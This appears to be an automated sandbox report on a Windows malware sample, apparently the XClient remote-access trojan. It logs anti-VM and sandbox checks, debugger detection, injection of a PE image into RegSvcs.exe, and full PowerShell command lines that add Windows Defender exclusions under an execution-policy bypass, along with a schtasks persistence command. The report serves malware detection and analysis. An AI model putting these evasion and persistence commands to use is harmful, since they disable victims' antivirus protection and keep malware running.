                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\XClient.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: 00000003.00000002.2068390929.00000000044F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 80c619d931fa4e5c89fe87aac0b6b143.exe PID: 6780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6668, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5036, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2164, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5776, type: MEMORYSTR
                Check if machine is in data center or colocation facility
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmp, 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4472153266.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4466712602.0000000000402000.00000020.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeMemory allocated: 2770000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\XClient.exeMemory allocated: 2380000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 2580000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 4580000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 16D0000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 3090000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 5090000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 1390000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 30A0000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 50A0000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 1360000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 3030000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 2E40000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 2E10000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 2FB0000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 4FB0000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 1330000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 2D40000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 4D40000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 13E0000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 2DC0000 memory reserve | memory write watch
                Source: C:\Users\user\XClient.exeMemory allocated: 4DC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2305Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7533Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6078Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3675Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6585Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3244Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7691Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2033Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5861
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3788
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exe TID: 2824Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6048Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1900Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep count: 7691 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 2033 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2556Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3964Thread sleep count: 5861 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3964Thread sleep count: 3788 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6100Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\user\XClient.exe TID: 1196Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\XClient.exe TID: 6000Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\XClient.exe TID: 5264Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\XClient.exe TID: 6508Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\XClient.exe TID: 1016Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\XClient.exe TID: 3576Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\XClient.exe TID: 2964Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\XClient.exeThread delayed: delay time: 922337203685477
                Source: RegSvcs.exe, 00000001.00000002.4466712602.0000000000402000.00000020.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                Source: RegSvcs.exe, 00000001.00000002.4467548579.0000000000E75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllce
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029AB570 CheckRemoteDebuggerPresent,1_2_029AB570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\XClient.exe'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\XClient.exe'Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Bypasses PowerShell execution policy
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 416000Jump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 418000Jump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A65008Jump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'regsvcs.exe'Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\XClient.exe'Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\XClient.exe"Jump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeQueries volume information: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\ VolumeInformationJump to behavior
